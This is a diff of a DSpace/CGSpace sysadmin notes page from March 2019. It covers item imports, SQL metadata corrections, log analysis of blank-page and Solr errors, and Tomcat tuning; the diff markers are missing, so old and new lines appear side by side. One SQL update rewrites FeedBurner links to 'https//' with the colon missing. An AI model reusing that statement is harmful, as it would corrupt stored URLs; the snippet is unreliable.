<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ I think I will need to ask Udana to re-copy and paste the abstracts with more ca
<p class="blog-post-meta">
<time datetime="2019-03-01T12:16:30+01:00">Fri Mar 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -151,7 +151,7 @@ I think I will need to ask Udana to re-copy and paste the abstracts with more ca
<ul>
<li>Trying to finally upload IITA&rsquo;s 259 Feb 14 items to CGSpace so I exported them from DSpace Test:</li>
</ul>
<pre><code>$ mkdir 2019-03-03-IITA-Feb14
<pre tabindex="0"><code>$ mkdir 2019-03-03-IITA-Feb14
$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
</code></pre><ul>
<li>As I was inspecting the archive I noticed that there were some problems with the bitstreams:
@ -163,7 +163,7 @@ $ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
</li>
<li>After adding the missing bitstreams and descriptions manually I tested them again locally, then imported them to a temporary collection on CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -c 10568/99832 -e aorth@stfu.com -m 2019-03-03-IITA-Feb14.map -s /tmp/2019-03-03-IITA-Feb14
<pre tabindex="0"><code>$ dspace import -a -c 10568/99832 -e aorth@stfu.com -m 2019-03-03-IITA-Feb14.map -s /tmp/2019-03-03-IITA-Feb14
</code></pre><ul>
<li>DSpace&rsquo;s export function doesn&rsquo;t include the collections for some reason, so you need to import them somewhere first, then export the collection metadata and re-map the items to proper owning collections based on their types using OpenRefine or something</li>
<li>After re-importing to CGSpace to apply the mappings, I deleted the collection on DSpace Test and ran the <code>dspace cleanup</code> script</li>
@ -180,7 +180,7 @@ $ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
<li>I suspect it&rsquo;s related to the email issue that ICT hasn&rsquo;t responded about since last week</li>
<li>As I thought, I still cannot send emails from CGSpace:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: blah@stfu.com
@ -197,7 +197,7 @@ Error sending email:
<li>ICT reset the email password and I confirmed that it is working now</li>
<li>Generate a controlled vocabulary of 1187 AGROVOC subjects from the top 1500 that I checked last month, dumping the terms themselves using <code>csvcut</code> and then applying XML controlled vocabulary format in vim and then checking with tidy for good measure:</li>
</ul>
<pre><code>$ csvcut -c name 2019-02-22-subjects.csv &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ csvcut -c name 2019-02-22-subjects.csv &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
$ # apply formatting in XML file
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
</code></pre><ul>
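<li>A couple of extra sanity checks on the generated file; a sketch (assuming one &lt;node&gt; element per term, as in DSpace&rsquo;s controlled vocabulary format):</li>
</ul>
<pre tabindex="0"><code>$ xmllint --noout dspace/config/controlled-vocabularies/dc-subject.xml
$ grep -c '&lt;node ' dspace/config/controlled-vocabularies/dc-subject.xml
</code></pre><ul>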
@ -217,7 +217,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
</ul>
</li>
</ul>
<pre><code># journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c &#39;Multiple update components target the same field:solr_update_time_stamp&#39;
1076
</code></pre><ul>
<li>I restarted Tomcat and it&rsquo;s OK now&hellip;</li>
@ -238,13 +238,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
<li>The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms</li>
<li>I see 46 occurrences of these with this query:</li>
</ul>
<pre><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE &#39;%http://feedburner.%&#39; OR text_value LIKE &#39;%http://feeds.feedburner.%&#39;);
</code></pre><ul>
<li>I can replace these globally using the following SQL:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https//feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feedburner.&#39;,&#39;https//feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feedburner.%&#39;;
UPDATE 43
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https//feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feeds.feedburner.&#39;,&#39;https//feeds.feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feeds.feedburner.%&#39;;
UPDATE 44
</code></pre><ul>
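<li>A quick re-run of the same search confirms whether any plain-HTTP FeedBurner links remain after the updates; a sketch:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT count(*) FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
</code></pre><ul>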
<li>I ran the corrections on CGSpace and DSpace Test</li>
@ -254,7 +254,7 @@ UPDATE 44
<li>Working on tagging IITA&rsquo;s items with their new research theme (<code>cg.identifier.iitatheme</code>) based on their existing IITA subjects (see <a href="/cgspace-notes/2018-02/">notes from 2019-02</a>)</li>
<li>I exported the entire IITA community from CGSpace and then used <code>csvcut</code> to extract only the needed fields:</li>
</ul>
<pre><code>$ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]&#39; ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>
<p>After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a <code>||</code>)</p>
@ -263,7 +263,7 @@ UPDATE 44
<p>I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:</p>
</li>
</ul>
<pre><code>if(isBlank(value), 'PLANT PRODUCTION &amp; HEALTH', value + '||PLANT PRODUCTION &amp; HEALTH')
<pre tabindex="0"><code>if(isBlank(value), &#39;PLANT PRODUCTION &amp; HEALTH&#39;, value + &#39;||PLANT PRODUCTION &amp; HEALTH&#39;)
</code></pre><ul>
<li>Then it&rsquo;s more annoying because there are four IITA subject columns&hellip;</li>
<li>In total this would add research themes to 1,755 items</li>
@ -288,11 +288,11 @@ UPDATE 44
</li>
<li>This is a bit ugly, but it works (using the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL helper function</a> to resolve ID to handle):</li>
</ul>
<pre><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'&quot; | grep -oE '[0-9]{3,}'); do
<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE &#39;%SWAZILAND%&#39;&#34; | grep -oE &#39;[0-9]{3,}&#39;); do
echo &quot;Getting handle for id: ${id}&quot;
echo &#34;Getting handle for id: ${id}&#34;
handle=$(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT ds5_item2itemhandle($id)&quot; | grep -oE '[0-9]{5}/[0-9]+')
handle=$(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT ds5_item2itemhandle($id)&#34; | grep -oE &#39;[0-9]{5}/[0-9]+&#39;)
~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
@ -300,7 +300,7 @@ done
</code></pre><ul>
<li>Then I couldn&rsquo;t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:</li>
</ul>
<pre><code>$ grep -oE '201[89]' /tmp/*.csv | sort -u
<pre tabindex="0"><code>$ grep -oE &#39;201[89]&#39; /tmp/*.csv | sort -u
/tmp/94834.csv:2018
/tmp/95615.csv:2018
/tmp/96747.csv:2018
@ -314,7 +314,7 @@ done
<li>CGSpace (linode18) has the blank page error again</li>
<li>I&rsquo;m not sure if it&rsquo;s related, but I see the following error in DSpace&rsquo;s log:</li>
</ul>
<pre><code>2019-03-15 14:09:32,685 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2019-03-15 14:09:32,685 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is closed.
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
@ -326,7 +326,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
</code></pre><ul>
<li>Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, <del>but spikes of over 1,000 today</del>, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently</li>
</ul>
<pre><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-0* | awk -F: &#39;{print $1}&#39; | sort | uniq -c | tail -n 25
5 dspace.log.2019-02-27
11 dspace.log.2019-02-28
29 dspace.log.2019-03-01
@ -356,14 +356,14 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
<li>(Update on 2019-03-23 to use correct grep query)</li>
<li>There are not too many connections currently in PostgreSQL:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
10 dspaceCli
15 dspaceWeb
</code></pre><ul>
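<li>The same breakdown can be had without grep by letting PostgreSQL group it; a sketch (assuming the application_name and state columns in pg_stat_activity):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT application_name, state, count(*) FROM pg_stat_activity GROUP BY 1, 2 ORDER BY 3 DESC'
</code></pre><ul>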
<li>I didn&rsquo;t see anything interesting in the PostgreSQL logs, though this stack trace from the Tomcat logs (in the systemd journal) from earlier today <em>might</em> be related?</li>
</ul>
<pre><code>SEVERE: Servlet.service() for servlet [spring] in context with path [] threw exception [org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.util.EmptyStackException] with root cause
<pre tabindex="0"><code>SEVERE: Servlet.service() for servlet [spring] in context with path [] threw exception [org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.util.EmptyStackException] with root cause
java.util.EmptyStackException
at java.util.Stack.peek(Stack.java:102)
at java.util.Stack.pop(Stack.java:84)
@ -436,14 +436,14 @@ java.util.EmptyStackException
<li>I copied the 2019 Solr statistics core from CGSpace to DSpace Test and it works (and is only 5.5GB currently), so now we have some useful stats on DSpace Test for the CUA module and the dspace-statistics-api</li>
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(164496) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(164496) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
<pre tabindex="0"><code># su - postgres
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);&#39;
UPDATE 1
</code></pre><h2 id="2019-03-18">2019-03-18</h2>
<ul>
@ -455,7 +455,7 @@ UPDATE 1
</li>
<li>Dump top 1500 subjects from CGSpace to try one more time to generate a list of invalid terms using my <code>agrovoc-lookup.py</code> script:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-03-18-top-1500-subject.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-03-18-top-1500-subject.csv WITH CSV HEADER;
COPY 1500
dspace=# \q
$ csvcut -c text_value /tmp/2019-03-18-top-1500-subject.csv &gt; 2019-03-18-top-1500-subject.csv
@ -474,7 +474,7 @@ $ wc -l 2019-03-18-subjects-unmatched.txt
<li>Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (<a href="https://github.com/ilri/DSpace/pull/416">#416</a>)</li>
<li>We are getting the blank page issue on CGSpace again today and I see a <del>large number</del> of the &ldquo;SQL QueryTable Error&rdquo; in the DSpace log again (last time was 2019-03-15):</li>
</ul>
<pre><code>$ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
<pre tabindex="0"><code>$ grep -c &#39;SQL QueryTable Error&#39; dspace.log.2019-03-1[5678]
dspace.log.2019-03-15:929
dspace.log.2019-03-16:67
dspace.log.2019-03-17:72
@ -482,9 +482,9 @@ dspace.log.2019-03-18:1038
</code></pre><ul>
<li>Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the &ldquo;binary file matches&rdquo; result with <code>-I</code>:</li>
</ul>
<pre><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-18 | wc -l
8
$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: &#39;{print $1}&#39; | sort | uniq -c
9 dspace.log.2019-03-08
25 dspace.log.2019-03-14
12 dspace.log.2019-03-15
@ -495,7 +495,7 @@ $ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F
<li>It seems to be something with grep doing binary matching on some log files for some reason, so I guess I need to always use <code>-I</code> to say binary files don&rsquo;t match</li>
<li>Anyways, the full error in DSpace&rsquo;s log is:</li>
</ul>
<pre><code>2019-03-18 12:26:23,331 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2019-03-18 12:26:23,331 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is closed.
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
@ -504,22 +504,22 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is c
</code></pre><ul>
<li>There is a low number of connections to PostgreSQL currently:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
33
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
7 dspaceCli
15 dspaceWeb
</code></pre><ul>
<li>I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:</li>
</ul>
<pre><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &quot;waiting&quot; does not exist at character 217
<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &#34;waiting&#34; does not exist at character 217
</code></pre><ul>
<li>This is unrelated and apparently due to <a href="https://github.com/munin-monitoring/munin/issues/746">Munin checking a column that was changed in PostgreSQL 9.6</a></li>
<li>I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it&rsquo;s a Cocoon thing?</li>
<li>Looking in the cocoon logs I see a large number of warnings about &ldquo;Can not load requested doc&rdquo; around 11AM and 12PM:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-18 | grep -oE &#39;2019-03-18 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-18 00:
6 2019-03-18 02:
3 2019-03-18 04:
@ -535,7 +535,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And a few days ago on 2019-03-15, when it last happened, it was in the afternoon, and the same pattern occurs around 12PM:</li>
</ul>
<pre><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-15.xz | grep -oE &#39;2019-03-15 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-15 01:
3 2019-03-15 02:
1 2019-03-15 03:
@ -561,7 +561,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And again on 2019-03-08, surprise surprise, it happened in the morning:</li>
</ul>
<pre><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-08.xz | grep -oE &#39;2019-03-08 [0-9]{2}:&#39; | sort | uniq -c
11 2019-03-08 01:
3 2019-03-08 02:
1 2019-03-08 03:
@ -581,7 +581,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
<li>I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for some pretty confusing debugging&hellip;</li>
<li>I will replace these in the database immediately to save myself the headache later:</li>
</ul>
<pre><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ &#39;.+\u00a0.+&#39;;
count
-------
84
@ -591,7 +591,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
<li>CGSpace (linode18) is having problems with Solr again, I&rsquo;m seeing &ldquo;Error opening new searcher&rdquo; in the Solr logs and there are no stats for previous years</li>
<li>Apparently the Solr statistics shards didn&rsquo;t load properly when we restarted Tomcat <em>yesterday</em>:</li>
</ul>
<pre><code>2019-03-18 12:32:39,799 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
<pre tabindex="0"><code>2019-03-18 12:32:39,799 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
...
Caused by: org.apache.solr.common.SolrException: Error opening new searcher
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
@ -603,7 +603,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>For reference, I don&rsquo;t see the <code>ulimit -v unlimited</code> in the <code>catalina.sh</code> script, though the <code>tomcat7</code> systemd service has <code>LimitAS=infinity</code></li>
<li>The limits of the current Tomcat java process are:</li>
</ul>
<pre><code># cat /proc/27182/limits
<pre tabindex="0"><code># cat /proc/27182/limits
Limit Soft Limit Hard Limit Units
Max cpu time unlimited unlimited seconds
Max file size unlimited unlimited bytes
@ -629,8 +629,8 @@ Max realtime timeout unlimited unlimited us
</li>
<li>For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:</li>
</ul>
<pre><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr/ -iname &quot;*.lock&quot; -delete
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr/ -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
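<li>The core status can also be checked from the command line via Solr&rsquo;s CoreAdmin API; a rough sketch (local port assumed):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/admin/cores?action=STATUS&amp;wt=json' | grep -oE 'statistics-[0-9]{4}'
</code></pre><ul>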
<li>After restarting I confirmed that all Solr statistics cores were loaded successfully&hellip;</li>
@ -660,10 +660,10 @@ Max realtime timeout unlimited unlimited us
<ul>
<li>It&rsquo;s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-20 | grep -oE &#39;2019-03-20 [0-9]{2}:&#39; | sort | uniq -c
3 2019-03-20 00:
12 2019-03-20 02:
$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-21 | grep -oE &#39;2019-03-21 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-21 00:
1 2019-03-21 02:
4 2019-03-21 03:
@ -704,7 +704,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
<ul>
<li>CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-22 00:
69 2019-03-22 01:
1 2019-03-22 02:
@ -727,7 +727,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
323 2019-03-22 21:
685 2019-03-22 22:
357 2019-03-22 23:
$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-23 | grep -oE &#39;2019-03-23 [0-9]{2}:&#39; | sort | uniq -c
575 2019-03-23 00:
445 2019-03-23 01:
518 2019-03-23 02:
@ -742,7 +742,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
<li>I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn&rsquo;t</li>
<li>Trying to drill down more, I see that the bulk of the errors started around 21:20:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 21:[0-9]&#39; | sort | uniq -c
1 2019-03-22 21:0
1 2019-03-22 21:1
59 2019-03-22 21:2
@ -752,11 +752,11 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
</code></pre><ul>
<li>Looking at the Cocoon log around that time I see the full error is:</li>
</ul>
<pre><code>2019-03-22 21:21:34,378 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
<pre tabindex="0"><code>2019-03-22 21:21:34,378 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
</code></pre><ul>
<li>A few milliseconds before that time I see this in the DSpace log:</li>
</ul>
<pre><code>2019-03-22 21:21:34,356 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2019-03-22 21:21:34,356 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
org.postgresql.util.PSQLException: This statement has been closed.
at org.postgresql.jdbc.PgStatement.checkClosed(PgStatement.java:694)
at org.postgresql.jdbc.PgStatement.getMaxRows(PgStatement.java:501)
@ -824,7 +824,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
<li>I did some more tests with the <a href="https://github.com/gnosly/TomcatJdbcConnectionTest">TomcatJdbcConnectionTest</a> thing and while monitoring the number of active connections in jconsole and after adjusting the limits quite low I eventually saw some connections get abandoned</li>
<li>I forgot that to connect to a remote JMX session with jconsole you need to use a dynamic SSH SOCKS proxy (as I originally <a href="/cgspace-notes/2017-11/">discovered in 2017-11</a>):</li>
</ul>
<pre><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=3000 service:jmx:rmi:///jndi/rmi://localhost:5400/jmxrmi -J-DsocksNonProxyHosts=
<pre tabindex="0"><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=3000 service:jmx:rmi:///jndi/rmi://localhost:5400/jmxrmi -J-DsocksNonProxyHosts=
</code></pre><ul>
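<li>For reference, the dynamic SOCKS proxy itself is just an SSH forward; something like this (user and host are placeholders):</li>
</ul>
<pre tabindex="0"><code>$ ssh -D 3000 -N user@linode18
</code></pre><ul>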
<li>I need to remember to check the active connections next time we have issues with blank item pages on CGSpace</li>
<li>In other news, I&rsquo;ve been running G1GC on DSpace Test (linode19) since 2018-11-08 without realizing it, which is probably a good thing</li>
@ -850,12 +850,12 @@ org.postgresql.util.PSQLException: This statement has been closed.
<ul>
<li>Could be an error in the docs, as I see the <a href="https://commons.apache.org/proper/commons-dbcp/configuration.html">Apache Commons DBCP</a> has -1 as the default</li>
<li>Maybe I need to re-evaluate the &ldquo;defaults&rdquo; of Tomcat 7&rsquo;s DBCP and set them explicitly in our config</li>
<li>From Tomcat 8 they seem to default to Apache Commons' DBCP 2.x</li>
<li>From Tomcat 8 they seem to default to Apache Commons&rsquo; DBCP 2.x</li>
</ul>
</li>
<li>Also, CGSpace doesn&rsquo;t have many Cocoon errors yet this morning:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-25 | grep -oE &#39;2019-03-25 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-25 00:
1 2019-03-25 01:
</code></pre><ul>
@ -869,7 +869,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
<li>Uptime Robot reported that CGSpace went down and I see the load is very high</li>
<li>The top IPs around the time in the nginx API and web logs were:</li>
</ul>
